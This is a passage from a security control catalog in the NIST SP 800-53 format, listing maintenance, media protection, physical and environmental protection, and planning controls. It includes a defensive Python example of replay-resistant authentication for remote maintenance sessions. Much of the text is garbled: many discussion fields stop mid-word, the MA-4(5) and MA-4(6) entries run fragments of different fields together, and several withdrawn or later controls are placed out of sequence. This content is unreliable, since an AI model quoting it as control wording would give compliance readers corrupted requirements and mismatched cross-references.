Discussion: Restricting the use of maintenance tools to only authorized personnel applies to systems that are us…
Related Controls: AC-3, AC-5, AC-6.

MA-3(5) Maintenance Tools | Execution with Privilege
Control Text: Monitor the use of maintenance tools that execute with increased privilege.
Discussion: Maintenance tools that execute with increased system privilege can result in unauthorized access to…
Related Controls: AC-3, AC-6.

MA-3(6) Maintenance Tools | Software Updates and Patches
Control Text: Inspect maintenance tools to ensure the latest software updates and patches are installed.
Discussion: Maintenance tools using outdated and/or unpatched software can provide a threat vector for adversarie…
Related Controls: AC-3, AC-6.

MA-4 Nonlocal Maintenance
Control Text: a. Approve and monitor nonlocal maintenance and diagnostic activities; b. Allow the use of nonlocal maintenance and diagnostic tools only as consistent with organizational policy and documented in the security plan for the system;
Discussion: Nonlocal maintenance and diagnostic activities are conducted by individuals who communicate through…
Related Controls: AC-2, AC-3, AC-6, AC-17, AU-2, AU-3, IA-2, IA-4, IA-5, IA-8, MA-2, MA-5, PL-2, SC-7, SC-10.

MA-4(1) Nonlocal Maintenance | Logging and Review
Control Text: (a) Log [Assignment: organization-defined audit events] for nonlocal maintenance and diagnostic sessions; and
Discussion: Audit logging for nonlocal maintenance is enforced by AU-2. Audit events are defined in AU-2a.
Related Controls: AU-6, AU-12.

MA-4(2) Nonlocal Maintenance | Document Nonlocal Maintenance
Control Text: [Withdrawn: Incorporated into MA-1 and MA-4.]

MA-4(3) Nonlocal Maintenance | Comparable Security and Sanitization
Control Text: (a) Require that nonlocal maintenance and diagnostic services be performed from a system that implements a security capability comparable to the capability implemented on the system being serviced; or
Discussion: Comparable security capability on systems, diagnostic tools, and equipment providing maintenance se…
Related Controls: MP-6, SI-3, SI-7.

MA-4(4) Nonlocal Maintenance | Authentication and Separation of Maintenance Sessions
Control Text: Protect nonlocal maintenance sessions by: (a) Employing [Assignment: organization-defined authenticators that are replay resistant]; and
Discussion: Communications paths can be logically separated using encryption.
Related Controls: None.
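The replay-resistant authenticator MA-4(4)(a) above calls for, as an added example (not code from the catalog or from NIST): the gateway issues a random single-use nonce per maintenance session, the technician's token answers with an HMAC over it, and a captured answer is rejected on replay, after the nonce expires, or against a different nonce. A static-password check is included only as the baseline that is not replay resistant: whatever was captured once works forever. The protocol framing, key handling and nonce lifetime are assumptions for the example.

```python
import hashlib
import hmac
import secrets

# Added example of a replay-resistant authenticator for a nonlocal maintenance
# session. Protocol, key handling and TTL are assumptions for the demo.

LABEL = b"maint-session\x00"   # domain separation: the MAC cannot be reused for another purpose


def respond(token_key: bytes, nonce: bytes) -> bytes:
    """Technician side: the token computes HMAC(key, label || nonce)."""
    return hmac.new(token_key, LABEL + nonce, hashlib.sha256).digest()


class MaintenanceGateway:
    """Gateway side. Each nonce is random, bound to one technician, expires,
    and is accepted exactly once, so a captured response is useless later."""

    def __init__(self, technician_keys: dict, nonce_ttl: float = 60.0):
        self._keys = technician_keys          # technician id -> token key (assumed provisioned out of band)
        self._ttl = nonce_ttl
        self._issued = {}                     # nonce -> (technician id, issued_at)
        self._used = set()

    def challenge(self, tech_id: str, now: float) -> bytes:
        nonce = secrets.token_bytes(16)
        self._issued[nonce] = (tech_id, now)
        return nonce

    def verify(self, tech_id: str, nonce: bytes, response: bytes, now: float) -> bool:
        record = self._issued.get(nonce)
        key = self._keys.get(tech_id)
        if record is None or key is None or record[0] != tech_id:
            return False                      # unknown nonce, unknown technician, or nonce issued to someone else
        if nonce in self._used or now - record[1] > self._ttl:
            return False                      # replayed or stale challenge
        if not hmac.compare_digest(respond(key, nonce), response):
            return False                      # wrong key
        self._used.add(nonce)                 # burn the nonce: single use
        return True


def static_password_check(stored: str, presented: str) -> bool:
    """Baseline that is not replay resistant: the same bytes succeed every time."""
    return hmac.compare_digest(stored.encode(), presented.encode())
```

The freshness comes from the nonce, not from the HMAC; a timestamp-only scheme fails the same test as soon as clock skew is tolerated, which is why the gateway keeps the used-nonce set rather than trusting the time alone.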
MA-4(5) Nonlocal Maintenance | Approvals and Notifications (a) the approval of each nonlocal maintenance session by [Assignment: organization- Notification may be performed by maintenance personnel. Approval of nonlocal maintenance is None.
MA-4(6) Nonlocal Maintenance | Cryptographic Protection defined personnel or roles]; and
Implement the following cryptographic mechanisms to protect the integrity and confidentiality of accomplished by personnel with sufficient information security
Failure to protect nonlocal maintenance and diagnostic communications can result in unauthorized indi and system knowledge to determine SC-8, SC-12, SC-13.
the appropriateness of the proposed maintenance.
MA-4(7) Nonlocal Maintenance | Disconnect Verification Verify session and network connection termination after the completion of nonlocal maintenance andVerifying the termination of a connection once maintenance is completed ensures that connections eAC-12.
MA-5 Maintenance Personnel a. Establish a process for maintenance personnel authorization and maintain a list of authorized maintenance organizations or personnel; Maintenance personnel refers to individuals who perform hardware or software maintenance on organiz AC-2, AC-3, AC-5, AC-6, IA-2, IA-8, MA-4, MP-2, PE-2, PE-3, PS-7, RA-3.
MA-5(1) Maintenance Personnel | Individuals Without Appropriate Access (a) Implement procedures for the use of maintenance personnel that lack appropriate security clearances or are not U.S. citizens, that include the following requirements: Procedures for individuals who lack appropriate security clearances or who are not U.S. citizens are MP-6, PL-2.
MA-5(2) Maintenance Personnel | Security Clearances for Classified Systems Verify that personnel performing maintenance and diagnostic activities on a system processing, storin Personnel who conduct maintenance on organizational systems may be exposed to classified information PS-3.
MA-5(3) Maintenance Personnel | Citizenship Requirements for Classified Systems Verify that personnel performing maintenance and diagnostic activities on a system processing, storing, Personnel who conduct maintenance on organizational systems may be exposed to classified information PS-3.

MA-5(4) Maintenance Personnel | Foreign Nationals Ensure that: (a) Foreign nationals with appropriate security clearances are used to conduct maintenance and diagnostic activities on classified systems only when the systems are jointly owned and operated by the United States and foreign allied governments, or owned and operated solely by foreign allied governments; and Personnel who conduct maintenance and diagnostic activities on organizational systems may be exposed PS-3.
MA-5(5) Maintenance Personnel | Non-system Maintenance Ensure that non-escorted personnel performing maintenance activities not directly associated with the system but in the physical proximity of the system, have required access authorizations. Personnel who perform maintenance activities in other capacities not directly related to the system include physical plant personnel and custodial personnel. None.
MA-6 Timely Maintenance Obtain maintenance support and/or spare parts for [Assignment: organization-defined system compone Organizations specify the system components that result in increased risk to organizational operatio CM-8, CP-2, CP-7, RA-7, SA-15, SI-13, SR-2, SR-3, SR-4.
MA-6(1) Timely Maintenance | Preventive Maintenance Perform preventive maintenance on [Assignment: organization-defined system components] at [Assignment: organization-defined time intervals]. Preventive maintenance includes proactive care and the servicing of system components to maintain organizational equipment and facilities in satisfactory operating condition. Such maintenance provides for the systematic inspection, tests, measurements, adjustments, parts replacement, detection, and correction of incipient failures either before they occur or before they None.
MA-6(2) Timely Maintenance | Predictive Maintenance Perform predictive maintenance on [Assignment: organization-defined system components] at [Assignment: organization-defined time intervals]. Predictive maintenance evaluates the condition of equipment by performing periodic or continuous (online) equipment condition monitoring. The goal of predictive maintenance is to perform maintenance at a scheduled time when the maintenance activity is most cost-effective and before the equipment loses performance within a threshold. The predictive component of predictive None.
MA-6(3) Timely Maintenance | Automated Support for Predictive Maintenance Transfer predictive maintenance data to a maintenance management system using [Assignment: organization-defined automated mechanisms]. A computerized maintenance management system maintains a database of information about the maintenance operations of organizations and automates the processing of equipment condition data to trigger maintenance planning, execution, and reporting. None.
MA-7 Field Maintenance Restrict or prohibit field maintenance on [Assignment: organization-defined systems or system compo Field maintenance is the type of maintenance conducted on a system or system component after the syst MA-2, MA-4, MA-5.
MP-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] media protection policy that: Media protection policy and procedures address the controls in the MP family that are implemented wit PM-9, PS-8, SI-12.
MP-2 Media Access Restrict access to [Assignment: organization-defined types of digital and/or non-digital media] to [As System media includes digital and non-digital media. Digital media includes flash drives, diskettes, ma AC-19, AU-9, CP-2, CP-9, CP-10, MA-5, MP-4, MP-6, PE-2, PE-3, SC-12, SC-13, SC-34, SI-12.
MP-2(1) Media Access | Automated Restricted Access [Withdrawn: Incorporated into MP-4(2).]
MP-2(2) Media Access | Cryptographic Protection [Withdrawn: Incorporated into SC-28(1).]
MP-3 Media Marking a. Mark system media indicating the distribution limitations, handling caveats, and applicable security markings (if any) of the information; and Security marking refers to the application or use of human-readable security attributes. Digital media AC-16, CP-9, MP-5, PE-22, SI-12.
MP-4 Media Storage a. Physically control and securely store [Assignment: organization-defined types of digital and/or non-digital media] within [Assignment: organization-defined controlled areas]; and System media includes digital and non-digital media. Digital media includes flash drives, diskettes, m AC-19, CP-2, CP-6, CP-9, CP-10, MP-2, MP-7, PE-3, PL-2, SC-12, SC-13, SC-28, SC-34, SI-12.
MP-4(1) Media Storage | Cryptographic Protection [Withdrawn: Incorporated into SC-28(1).]
MP-4(2) Media Storage | Automated Restricted Access Restrict access to media storage areas and log access attempts and access granted using [Assignme Automated mechanisms include keypads, biometric readers, or card readers on the external entries t AC-3, AU-2, AU-6, AU-9, AU-12, PE-3.
MP-5 Media Transport a. Protect and control [Assignment: organization-defined types of system media] during transport outside of controlled areas using [Assignment: organization-defined controls]; System media includes digital and non-digital media. Digital media includes flash drives, diskettes, AC-7, AC-19, CP-2, CP-9, MP-3, MP-4, PE-16, PL-2, SC-12, SC-13, SC-28, SC-34.
MP-5(1) Media Transport | Protection Outside of Controlled Areas [Withdrawn: Incorporated into MP-5.]
MP-5(2) Media Transport | Documentation of Activities [Withdrawn: Incorporated into MP-5.]
MP-5(3) Media Transport | Custodians Employ an identified custodian during transport of system media outside of controlled areas. Identified custodians provide organizations with specific points of contact during the media transport process and facilitate individual accountability. Custodial responsibilities can be transferred from one individual to another if an unambiguous custodian is identified. None.
MP-5(4) Media Transport | Cryptographic Protection [Withdrawn: Incorporated into SC-28(1).]
MP-6 Media Sanitization a. Sanitize [Assignment: organization-defined system media] prior to disposal, release out of organizational control, or release for reuse using [Assignment: organization-defined sanitization techniques and procedures]; and Media sanitization applies to all digital and non-digital system media subject to disposal or reuse, AC-3, AC-7, AU-11, MA-2, MA-3, MA-4, MA-5, PM-22, SI-12, SI-18, SI-19, SR-11.
MP-6(1) Media Sanitization | Review, Approve, Track, Document, and Verify Review, approve, track, document, and verify media sanitization and disposal actions. Organizations review and approve media to be sanitized to ensure compliance with records retention policies. Tracking and documenting actions include listing personnel who reviewed and approved sanitization and disposal actions, types of media sanitized, files stored on the media, sanitization methods used, date and time of the sanitization actions, personnel who performed the None.
MP-6(2) Media Sanitization | Equipment Testing Test sanitization equipment and procedures [Assignment: organization-defined frequency] to ensure that the intended sanitization is being achieved. Testing of sanitization equipment and procedures may be conducted by qualified and authorized external entities, including federal agencies or external service providers. None.
MP-6(3) Media Sanitization | Nondestructive Techniques Apply nondestructive sanitization techniques to portable storage devices prior to connecting such devices to the system under the following circumstances: [Assignment: organization-defined circumstances requiring sanitization of portable storage devices]. Portable storage devices include removable hard disk drives (e.g., solid state, magnetic), optical discs, magnetic or optical tapes, flash memory devices, flash memory cards, and other external or removable disks. Portable storage devices can be obtained from untrustworthy sources and contain malicious code that can be inserted into or transferred to organizational systems None.
MP-6(4) Media Sanitization | Controlled Unclassified Information [Withdrawn: Incorporated into MP-6.]
MP-6(5) Media Sanitization | Classified Information [Withdrawn: Incorporated into MP-6.]
MP-6(6) Media Sanitization | Media Destruction [Withdrawn: Incorporated into MP-6.]
MP-6(7) Media Sanitization | Dual Authorization Enforce dual authorization for the sanitization of [Assignment: organization-defined system media]. Organizations employ dual authorization to help ensure that system media sanitization cannot occur unl AC-3, MP-2.
MP-6(8) Media Sanitization | Remote Purging or Wiping of Information Provide the capability to purge or wipe information from [Assignment: organization-defined systems or system components] [Selection: remotely; under the following conditions: [Assignment: organization-defined conditions]]. Remote purging or wiping of information protects information on organizational systems and system components if systems or components are obtained by unauthorized individuals. Remote purge or wipe commands require strong authentication to help mitigate the risk of unauthorized individuals purging or wiping the system, component, or device. The purge or wipe function can be None.
MP-7 Media Use a. [Selection: Restrict; Prohibit] the use of [Assignment: organization-defined types of system media] on [Assignment: organization-defined systems or system components] using [Assignment: organization-defined controls]; and System media includes both digital and non-digital media. Digital media includes diskettes, magnetic ta AC-19, AC-20, PL-4, PM-12, SC-34, SC-41.
MP-7(1) Media Use | Prohibit Use Without Owner [Withdrawn: Incorporated into MP-7.]
MP-7(2) Media Use | Prohibit Use of Sanitization-resistant Media Prohibit the use of sanitization-resistant media in organizational systems. Sanitization resistance refers to how resistant media are to non-destructive sanitization techniques MP-6.
MP-8 Media Downgrading a. Establish [Assignment: organization-defined system media downgrading process] that includes employing downgrading mechanisms with strength and integrity commensurate with the security category or classification of the information; Media downgrading applies to digital and non-digital media subject to release outside of the organization, whether the media is considered removable or not. When applied to system media, the downgrading process removes information from the media, typically by security category or classification level, such that the information cannot be retrieved or reconstructed. Downgrading of None.
MP-8(1) Media Downgrading | Documentation of Process Document system media downgrading actions. Organizations can document the media downgrading process by providing information, such as the downgrading technique employed, the identification number of the downgraded media, and the identity of the individual that authorized and/or performed the downgrading action. None.
MP-8(2) Media Downgrading | Equipment Testing Test downgrading equipment and procedures [Assignment: organization-defined frequency] to ensure that downgrading actions are being achieved. None.
MP-8(3) Media Downgrading | Controlled Unclassified Information Downgrade system media containing controlled unclassified information prior to public release. The downgrading of controlled unclassified information uses approved sanitization tools, techniques, and procedures. None.
MP-8(4) Media Downgrading | Classified Information Downgrade system media containing classified information prior to release to individuals without required access authorizations. Downgrading of classified information uses approved sanitization tools, techniques, and procedures to transfer information confirmed to be unclassified from classified systems to unclassified media. None.
PE-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] physical and environmental protection policy that: Physical and environmental protection policy and procedures address the controls in the PE family tha AT-3, PM-9, PS-8, SI-12.
PE-2 Physical Access Authorizations a. Develop, approve, and maintain a list of individuals with authorized access to the facility where the system resides; Physical access authorizations apply to employees and visitors. Individuals with permanent physical acc AT-3, AU-9, IA-4, MA-5, MP-2, PE-3, PE-4, PE-5, PE-8, PM-12, PS-3, PS-4, PS-5, PS-6.
PE-2(1) Physical Access Authorizations | Access by Position or Role Authorize physical access to the facility where the system resides based on position or role. Role-based facility access includes access by authorized permanent and regular/routine maintenance AC-2, AC-3, AC-6.
PE-2(2) Physical Access Authorizations | Two Forms of Identification Require two forms of identification from the following forms of identification for visitor access to the Acceptable forms of identification include passports, REAL ID-compliant drivers’ licenses, and Persona IA-2, IA-4, IA-5.
PE-2(3) Physical Access Authorizations | Restrict Unescorted Access Restrict unescorted access to the facility where the system resides to personnel with [Selection (one Individuals without required security clearances, access approvals, or need to know are escorted by PS-2, PS-6.
PE-3 Physical Access Control a. Enforce physical access authorizations at [Assignment: organization-defined entry and exit points to the facility where the system resides] by: Physical access control applies to employees and visitors. Individuals with permanent physical access AT-3, AU-2, AU-6, AU-9, AU-13, CP-10, IA-3, IA-8, MA-5, MP-2, MP-4, PE-2, PE-4, PE-5, PE-8, PS-2, PS-3, PS-6, PS-7, RA-3, SC-28, SI-4, SR-3.
PE-3(1) Physical Access Control | System Access Enforce physical access authorizations to the system in addition to the physical access controls for the facility at [Assignment: organization-defined physical spaces containing one or more components of the system]. Control of physical access to the system provides additional physical security for those areas within facilities where there is a concentration of system components. None.
PE-3(2) Physical Access Control | Facility and Systems Perform security checks [Assignment: organization-defined frequency] at the physical perimeter of the Organizations determine the extent, frequency, and/or randomness of security checks to adequately mi AC-4, SC-7.
PE-3(3) Physical Access Control | Continuous Guards Employ guards to control [Assignment: organization-defined physical access points] to the facility wh Employing guards at selected physical access points to the facility provides a more rapid response capa CP-6, CP-7, PE-6.
PE-3(4) Physical Access Control | Lockable Casings Use lockable physical casings to protect [Assignment: organization-defined system components] from unauthorized physical access. The greatest risk from the use of portable devices—such as smart phones, tablets, and notebook computers—is theft. Organizations can employ lockable, physical casings to reduce or eliminate the risk of equipment theft. Such casings come in a variety of sizes, from units that protect a single notebook computer to full cabinets that can protect multiple servers, computers, and peripherals. None.
PE-3(5) Physical Access Control | Tamper Protection Employ [Assignment: organization-defined anti-tamper technologies] to [Selection (one or more): de Organizations can implement tamper detection and prevention at selected hardware components or im SA-16, SR-9, SR-11.
PE-10(1) Emergency Shutoff | Accidental and Unauthorized Activation [Withdrawn: Incorporated into PE-10.]
PE-3(7) Physical Access Control | Physical Barriers Limit access using physical barriers. Physical barriers include bollards, concrete slabs, jersey walls, and hydraulic active vehicle barriers. None.
PE-3(8) Physical Access Control | Access Control Vestibules Employ access control vestibules at [Assignment: organization-defined locations within the facility]. An access control vestibule is part of a physical access control system that typically provides a space between two sets of interlocking doors. Vestibules are designed to prevent unauthorized individuals from following authorized individuals into facilities with controlled access. This activity, also known as piggybacking or tailgating, results in unauthorized access to the facility. Interlocking None.
PE-4 Access Control for Transmission Control physical access to [Assignment: organization-defined system distribution and transmission line Security controls applied to system distribution and transmission lines prevent accidental damage, di AT-3, IA-4, MP-2, MP-4, PE-2, PE-3, PE-5, PE-9, SC-7, SC-8.
PE-5 Access Control for Output Devices Control physical access to output from [Assignment: organization-defined output devices] to prevent Controlling physical access to output devices includes placing output devices in locked rooms or othe PE-2, PE-3, PE-4, PE-18.
PE-13(3) Fire Protection | Automatic Fire Suppression [Withdrawn: Incorporated into PE-13(2).]
PE-5(2) Access Control for Output Devices | Link to Individual Identity Link individual identity to receipt of output from output devices. Methods for linking individual identity to the receipt of output from output devices include installing security functionality on facsimile machines, copiers, and printers. Such functionality allows organizations to implement authentication on output devices prior to the release of output to individuals. None.
PE-18(1) Location of System Components | Facility Site [Withdrawn: Moved to PE-23.]
PE-6 Monitoring Physical Access a. Monitor physical access to the facility where the system resides to detect and respond to physical security incidents; Physical access monitoring includes publicly accessible areas within organizational facilities. Exampl AU-2, AU-6, AU-9, AU-12, CA-7, CP-10, IR-4, IR-8.
PE-6(1) Monitoring Physical Access | Intrusion Alarms and Surveillance Equipment Monitor physical access to the facility where the system resides using physical intrusion alarms and surveillance equipment. Physical intrusion alarms can be employed to alert security personnel when unauthorized access to the facility is attempted. Alarm systems work in conjunction with physical barriers, physical access control systems, and security guards by triggering a response when these other forms of security have been compromised or breached. Physical intrusion alarms can include different types of None.
PE-6(2) Monitoring Physical Access | Automated Intrusion Recognition and Responses Recognize [Assignment: organization-defined classes or types of intrusions] and initiate [Assignmen Response actions can include notifying selected organizational personnel or law enforcement personn SI-4.
PE-6(3) Monitoring Physical Access | Video Surveillance (a) Employ video surveillance of [Assignment: organization-defined operational areas]; (b) Review video recordings [Assignment: organization-defined frequency]; and Video surveillance focuses on recording activity in specified areas for the purposes of subsequent review, if circumstances so warrant. Video recordings are typically reviewed to detect anomalous events or incidents. Monitoring the surveillance video is not required, although organizations may choose to do so. There may be legal considerations when performing and retaining video None.
PE-6(4) Monitoring Physical Access | Monitoring Physical Access to Systems Monitor physical access to the system in addition to the physical access monitoring of the facility at [Assignment: organization-defined physical spaces containing one or more components of the system]. Monitoring physical access to systems provides additional monitoring for those areas within facilities where there is a concentration of system components, including server rooms, media storage areas, and communications centers. Physical access monitoring can be coordinated with intrusion detection systems and system monitoring capabilities to provide comprehensive and None.
PE-3(6) Physical Access Control | Facility Penetration Testing [Withdrawn: Incorporated into CA-8.]
PE-8 Visitor Access Records a. Maintain visitor access records to the facility where the system resides for [Assignment: organization-defined time period]; Visitor access records include the names and organizations of individuals visiting, visitor signatures, and PE-2, PE-3, PE-6.
PE-8(1) Visitor Access Records | Automated Records Maintenance and Review Maintain and review visitor access records using [Assignment: organization-defined automated mechanisms]. Visitor access records may be stored and maintained in a database management system that is accessible by organizational personnel. Automated access to such records facilitates record reviews on a regular basis to determine if access authorizations are current and still required to support organizational mission and business functions. None.
PE-5(1) Access Control for Output Devices | Access to Output by Authorized Individuals [Withdrawn: Incorporated into PE-5.]
PE-8(3) Visitor Access Records | Limit Personally Identifiable Information Elements Limit personally identifiable information contained in visitor access records to the following element Organizations may have requirements that specify the contents of visitor access records. Limiting pers RA-3, SA-8.
PE-9 Power Equipment and Cabling Protect power equipment and power cabling for the system from damage and destruction. Organizations determine the types of protection necessary for the power equipment and cabling employ PE-4.
PE-9(1) Power Equipment and Cabling | Redundant Cabling Employ redundant power cabling paths that are physically separated by [Assignment: organization-defined distance]. Physically separate and redundant power cables ensure that power continues to flow in the event that one of the cables is cut or otherwise damaged. None.
PE-9(2) Power Equipment and Cabling | Automatic Voltage Controls Employ automatic voltage controls for [Assignment: organization-defined critical system components]. Automatic voltage controls can monitor and control voltage. Such controls include voltage regulators, voltage conditioners, and voltage stabilizers. None.
PE-10 Emergency Shutoff a. Provide the capability of shutting off power to [Assignment: organization-defined system or individual system components] in emergency situations; Emergency power shutoff primarily applies to organizational facilities that contain concentrations PE-15.
PE-5(3) Access Control for Output Devices | Marking Output Devices [Withdrawn: Incorporated into PE-22.]
PE-11 Emergency Power Provide an uninterruptible power supply to facilitate [Selection (one or more): an orderly shutdown o An uninterruptible power supply (UPS) is an electrical system or mechanism that provides emergency p AT-3, CP-2, CP-7.
PE-11(1) Emergency Power | Alternate Power Supply — Minimal Operational Capability Provide an alternate power supply for the system that is activated [Selection: manually; automatically] and that can maintain minimally required operational capability in the event of an extended loss of the primary power source. Provision of an alternate power supply with minimal operating capability can be satisfied by accessing a secondary commercial power supply or other external power supply. None.
PE-11(2) Emergency Power | Alternate Power Supply — Self-contained Provide an alternate power supply for the system that is activated [Selection: manually; automatically] and that is: The provision of a long-term, self-contained power supply can be satisfied by using one or more generators with sufficient capacity to meet the needs of the organization. None.
PE-12 Emergency Lighting Employ and maintain automatic emergency lighting for the system that activates in the event of a pow The provision of emergency lighting applies primarily to organizational facilities that contain conce CP-2, CP-7.
PE-12(1) Emergency Lighting | Essential Mission and Business Functions Provide emergency lighting for all areas within the facility supporting essential mission and business functions. Organizations define their essential missions and functions. None.
PE-13 Fire Protection Employ and maintain fire detection and suppression systems that are supported by an independent e The provision of fire detection and suppression systems applies primarily to organizational faciliti AT-3.
PE-13(1) Fire Protection | Detection Systems — Automatic Activation and Notification Employ fire detection systems that activate automatically and notify [Assignment: organization-defined personnel or roles] and [Assignment: organization-defined emergency responders] in the event of a fire. Organizations can identify personnel, roles, and emergency responders if individuals on the notification list need to have access authorizations or clearances (e.g., to enter to facilities where access is restricted due to the classification or impact level of information within the facility). Notification mechanisms may require independent energy sources to ensure that the notification None.
PE-13(2) Fire Protection | Suppression Systems — Automatic Activation and Notification (a) Employ fire suppression systems that activate automatically and notify [Assignment: organization-defined personnel or roles] and [Assignment: organization-defined emergency responders]; and Organizations can identify specific personnel, roles, and emergency responders if individuals on the notification list need to have appropriate access authorizations and/or clearances (e.g., to enter to facilities where access is restricted due to the impact level or classification of information within the facility). Notification mechanisms may require independent energy sources to ensure that the None.
PE-7 Visitor Control [Withdrawn: Incorporated into PE-2 and PE-3.]
PE-13(4) Fire Protection | Inspections Ensure that the facility undergoes [Assignment: organization-defined frequency] fire protection inspections by authorized and qualified inspectors and identified deficiencies are resolved within [Assignment: organization-defined time period]. Authorized and qualified personnel within the jurisdiction of the organization include state, county, and city fire inspectors and fire marshals. Organizations provide escorts during inspections in situations where the systems that reside within the facilities contain sensitive information. None.
PE-14 Environmental Controls a. Maintain [Selection (one or more): temperature; humidity; pressure; radiation; [Assignment: organization-defined environmental control]] levels within the facility where the system resides at [Assignment: organization-defined acceptable levels]; and The provision of environmental controls applies primarily to organizational facilities that contain AT-3, CP-2.
PE-14(1) Environmental Controls | Automatic Controls Employ the following automatic environmental controls in the facility to prevent fluctuations potentially harmful to the system: [Assignment: organization-defined automatic environmental controls]. The implementation of automatic environmental controls provides an immediate response to environmental conditions that can damage, degrade, or destroy organizational systems or systems components. None.
PE-14(2) Environmental Controls | Monitoring with Alarms and Notifications Employ environmental control monitoring that provides an alarm or notification of changes potentially harmful to personnel or equipment to [Assignment: organization-defined personnel or roles]. The alarm or notification may be an audible alarm or a visual message in real time to personnel or roles defined by the organization. Such alarms and notifications can help minimize harm to individuals and damage to organizational assets by facilitating a timely incident response. None.
PE-15 Water Damage Protection Protect the system from damage resulting from water leakage by providing master shutoff or isolation The provision of water damage protection primarily applies to organizational facilities that contain c AT-3, PE-10.
PE-15(1) Water Damage Protection | Automation Support Detect the presence of water near the system and alert [Assignment: organization-defined personnel or roles] using [Assignment: organization-defined automated mechanisms]. Automated mechanisms include notification systems, water detection sensors, and alarms. None.
PE-16 Delivery and Removal a. Authorize and control [Assignment: organization-defined types of system components] entering and exiting the facility; and Enforcing authorizations for entry and exit of system components may require restricting access to de CM-3, CM-8, MA-2, MA-3, MP-5, PE-20, SR-2, SR-3, SR-4, SR-6.

PE-17 Alternate Work Site a. Determine and document the [Assignment: organization-defined alternate work sites] allowed for use by employees; Alternate work sites include government facilities or the private residences of employees. While disti AC-17, AC-18, CP-7.
PE-18 Location of System Components Position system components within the facility to minimize potential damage from [Assignment: orga Physical and environmental hazards include floods, fires, tornadoes, earthquakes, hurricanes, terror CP-2, PE-5, PE-19, PE-20, RA-3.
PE-8(2) Visitor Access Records | Physical Access Records [Withdrawn: Incorporated into PE-2.]
PE-19 Information Leakage Protect the system from information leakage due to electromagnetic signals emanations. Information leakage is the intentional or unintentional release of data or information to an untrusted AC-18, PE-18, PE-20.
PE-19(1) Information Leakage | National Emissions Policies and Procedures Protect system components, associated data communications, and networks in accordance with national Emissions Security policies and procedures based on the security category or classification of the information. Emissions Security (EMSEC) policies include the former TEMPEST policies. None.
PE-20 Asset Monitoring and Tracking Employ [Assignment: organization-defined asset location technologies] to track and monitor the loca Asset location technologies can help ensure that critical assets—including vehicles, equipment, and CM-8, PE-16, PM-8.
PE-21 Electromagnetic Pulse Protection Employ [Assignment: organization-defined protective measures] against electromagnetic pulse dama An electromagnetic pulse (EMP) is a short burst of electromagnetic energy that is spread over a rang PE-18, PE-19.
PE-22 Component Marking Mark [Assignment: organization-defined system hardware components] indicating the impact level or Hardware components that may require marking include input and output devices. Input devices include AC-3, AC-4, AC-16, MP-3.
PE-23 Facility Location a. Plan the location or site of the facility where the system resides considering physical and environmental hazards; and Physical and environmental hazards include floods, fires, tornadoes, earthquakes, hurricanes, terrori CP-2, PE-18, PE-19, PM-8, PM-9, RA-3.
PL-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] planning policy that: Planning policy and procedures for the controls in the PL family implemented within systems and organ PM-9, PS-8, SI-12.
PL-2 System Security and Privacy Plans a. Develop security and privacy plans for the system that: 1. Are consistent with the organization’s enterprise architecture; System security and privacy plans are scoped to the system and system components within the defined authorization boundary and contain an overview of the security and privacy requirements for the system and the controls selected to satisfy the requirements. The plans describe the intended application of each selected control in the context of the system with a sufficient level of AC-2, AC-6, AC-14, AC-17, AC-20, CA-2, CA-3, CA-7, CM-9, CM-13, CP-2, CP-4, IR-4, IR-8, MA-4, MA-5, MP-4, MP-5, PL-7, PL-8, PL-10, PL-11, PM-1, PM-7, PM-8, PM-9, PM-10, PM-11, RA-3, RA-8, RA-9, SA-5, SA-17, SA-22, SI-12, SR-2, SR-4.
PL-2(1) System Security and Privacy Plans | Concept of Operations [Withdrawn: Incorporated into PL-7.]
PL-2(2) System Security and Privacy Plans | Functional Architecture [Withdrawn: Incorporated into PL-8.]
PL-2(3) System Security and Privacy Plans | Plan and Coordinate with Other Organizational Entities [Withdrawn: Incorporated into PL-2.]
PL-3 System Security Plan Update [Withdrawn: Incorporated into PL-2.]
PL-4 Rules of Behavior a. Establish and provide to individuals requiring access to the system, the rules that describe their responsibilities and expected behavior for information and system usage, security, and privacy; Rules of behavior represent a type of access agreement for organizational users. Other types of acces AC-2, AC-6, AC-8, AC-9, AC-17, AC-18, AC-19, AC-20, AT-2, AT-3, CM-11, IA-2, IA-4, IA-5, MP-7, PS-6, PS-8, SA-5, SI-12.
PL-4(1) Rules of Behavior | Social Media and External Site/application Usage Restrictions Include in the rules of behavior, restrictions on: (a) Use of social media, social networking sites, and external sites/applications; Social media, social networking, and external site/application usage restrictions address rules of beh AC-22, AU-13.
PL-5 Privacy Impact Assessment [Withdrawn: Incorporated into RA-8.]
PL-6 Security-related Activity Planning [Withdrawn: Incorporated into PL-2.]
PL-7 Concept of Operations a. Develop a Concept of Operations (CONOPS) for the system describing how the organization intends to operate the system from the perspective of information security and privacy; and The CONOPS may be included in the security or privacy plans for the system or in other system devel PL-2, SA-2, SI-12.
PL-8 Security and Privacy Architectures a. Develop security and privacy architectures for the system that: 1. Describe the requirements and approach to be taken for protecting the confidentiality, integrity, and availability of organizational information; The security and privacy architectures at the system level are consistent with the organization-wide security and privacy architectures described in PM-7, which are integral to and developed as part of the enterprise architecture. The architectures include an architectural description, the allocation of security and privacy functionality (including controls), security- and privacy-related information for CM-2, CM-6, PL-2, PL-7, PL-9, PM-5, PM-7, RA-9, SA-3, SA-5, SA-8, SA-17, SC-7.
PL-8(1) Security and Privacy Architectures | Defense in Depth Design the security and privacy architectures for the system using a defense-in-depth approach that: Organizations strategically allocate security and privacy controls in the security and privacy archite SC-2, SC-3, SC-29, SC-36.
PL-8(2) Security and Privacy Architectures | Supplier Diversity Require that [Assignment: organization-defined controls] allocated to [Assignment: organization-defin Information technology products have different strengths and weaknesses. Providing a broad spectrum o SC-29, SR-3.
PL-9 Central Management Centrally manage [Assignment: organization-defined controls and related processes]. Central management refers to organization-wide management and implementation of selected controls and processes. This includes planning, implementing, assessing, authorizing, and monitoring the organization-defined, centrally managed controls and processes. As the central management of controls is generally associated with the concept of common (inherited) controls, PL-8, PM-9.
PL-10 Baseline Selection Select a control baseline for the system. Control baselines are predefined sets of controls specifically assembled to address the protection ne PL-2, PL-11, RA-2, RA-3, SA-8.
